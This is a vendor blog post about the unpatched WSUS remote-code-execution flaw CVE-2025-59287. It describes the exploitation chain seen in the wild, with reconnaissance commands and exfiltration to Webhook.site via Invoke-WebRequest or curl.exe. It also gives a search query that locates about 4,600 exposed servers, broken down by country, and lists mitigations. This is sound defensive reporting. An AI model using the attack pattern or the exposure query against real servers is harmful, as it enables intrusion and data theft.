Still 4,600+ WSUS Servers Unpatched After Critical RCE Flaw (CVE-2025–59287)
Criminal IP
Follow
4 min read·Nov 6, 2025
50
Listen
Share
Press enter or click to view image in full size
On October 14, 2025, Microsoft disclosed a WSUS RCE vulnerability, CVE-2025–59287 (CVSS 9.8). This vulnerability is exploitable without authentication and proof-of-concept code has been published, enabling active exploitation by attackers. Microsoft released an initial fix in the October patch, but it was incomplete; an emergency follow-up patch was distributed on October 23 and installation is strongly recommended.
Breaking Down CVE-2025–59287: The Microsoft WSUS RCE Flaw Explained
CVE-2025–59287 is a vulnerability in Windows Server Update Services (WSUS) where unvalidated data is processed during deserialization. An attacker can craft manipulated AuthorizationCookie (or similar) to remotely execute arbitrary code as SYSTEM without authentication.
Because WSUS plays a central role in distributing updates, a compromised WSUS server can become a springboard for lateral movement within the internal network and for large-scale propagation. When WSUS is exposed to the Internet on default ports (8530/8531), it becomes trivially exploitable via automated scanning.
Press enter or click to view image in full size
How the WSUS RCE Vulnerability Can Be Exploited
The exploitation flow for WSUS RCE is relatively simple but highly destructive.
-
Attackers scan and target publicly exposed WSUS instances (default TCP ports 8530/8531) to gain initial access without authentication.
-
Forensic process chains observed include:
wsusservice.exe → cmd.exe → cmd.exe → powershell.exe- or
w3wp.exe → cmd.exe → cmd.exe → powershell.exe
-
These chains execute malicious PowerShell commands. The initial payload runs commands such as
whoami,net user /domain, andipconfig /allto quickly map internal domain structure and identify high-value accounts for lateral movement. -
Collected information is exfiltrated to attacker-controlled endpoints (e.g., Webhook.site) using
Invoke-WebRequest(orcurl.exeas needed).
Therefore, WSUS servers must immediately apply Microsoft’s latest security updates. If urgent patching is not possible, temporary mitigations such as blocking the WSUS ports or disabling WSUS should be implemented.
Criminal IP Detection Finds 4,616 Unprotected Instances
Attackers initially target publicly exposed WSUS instances on default TCP ports 8530 (HTTP) and 8531 (HTTPS). Using Criminal IP Asset Search, exposed WSUS instances that are susceptible to scanning can be identified.
Get Criminal IP’s stories in your inbox
Join Medium for free to get updates from this writer.
Subscribe
Subscribe
WSUS is not a simple file server; it is a web service suite that handles client requests (Windows Update Agent) and runs on IIS (Internet Information Services) as an ASP.NET application (APIs, admin console, metadata transfers, etc.). Therefore, the query that finds WSUS devices — “Microsoft-IIS” port:8530 OR port:8531 — combines the HTTP Server header Microsoft-IIS (indicating Windows Server / IIS) with WSUS’s default TCP ports 8530 and 8531 to detect matching instances.
Criminal IP Search Query:
“Microsoft-IIS” port:8530 OR port:8531
www.criminalip.io/asset/searc…
Press enter or click to view image in full size
As of November 4, 2025, Criminal IP reports a total of 4,616 externally exposed WSUS instances. Given the active exploitation of this unauthenticated RCE, these 4,616 exposed assets represent high-priority targets that must be remediated immediately.
Criminal IP Data Breakdown by Country
Using Criminal IP’s Element Analysis, you can view country-level statistics for assets exposed to the WSUS RCE vulnerability.
Criminal IP Element Analysis:
“Microsoft-IIS” port:8530 OR port:8531
www.criminalip.io/intelligenc…
Press enter or click to view image in full size
Among the 4,616 exposed assets, the United States accounts for the largest share with 1,033 exposed instances, representing about 22% of the total. Germany, China, and the United Kingdom follow with 395, 286, and 212 exposed instances respectively. These countries host large enterprise infrastructures, making urgent security measures necessary.
In-Depth Analysis of Scanned Target IPs
Clicking into a detected WSUS instance in Criminal IP’s Asset Search provides an IP report for detailed analysis.
Press enter or click to view image in full size
For example, analysis of detected WSUS targets shows that some assets have multiple open ports (e.g., SSH on port 22 and WSUS on port 8530). Assets with exposed remote ports are not only initial targets for the active WSUS RCE exploitation but also potential candidates for chained attacks involving additional vulnerabilities.
Security Measures Against the WSUS RCE Vulnerability (CVE-2025–59287)
Because CVE-2025–59287 enables code execution and potential SYSTEM privilege takeover, administrators should immediately implement the following measures, including Microsoft’s official recommendations:
- Apply emergency patches immediately: Install Microsoft’s published security updates to remediate the vulnerability.
- Restrict Internet exposure and access controls: Place WSUS servers behind an authenticated proxy or otherwise limit direct Internet exposure and port accessibility.
- Conduct detailed web and system log analysis: Investigate for suspicious requests to WSUS ports or evidence of PowerShell execution to detect potential compromise.
- Continuous attack surface monitoring: Use attack surface management tools such as Criminal IP to proactively check for external exposure of internal assets.
Conclusion
CVE-2025–59287 (WSUS RCE) is a high-risk vulnerability that combines unauthenticated remote code execution with the risk of Internet exposure of an internal service. With thousands of assets exposed globally, administrators must prioritize installing Microsoft’s emergency updates, verify and limit external exposure of WSUS servers, and use attack surface management and threat intelligence tools such as Criminal IP for proactive defense.
In relation to this, you can refer to Three Critical Apache Tomcat Vulnerabilities — Over 540K Exposed Instances Need Immediate Inspection (CVE-2025–55752, CVE-2025–55754, CVE-2025–61795). CSD0tFqvECLokhw9aBeRqqy7pDVE9jtHSghPeFdiPyHFl1415NsQzESpiaHqTM4zdwdCFGH3Xng4/AUddYubU+oQFRi9LLW+FTX595zP+dRLKZnhxZSblmYGup4I80jutuuXuh7137eqGrIsVMhouMAZGUZyJZsjMQa8a8PT9Dw=
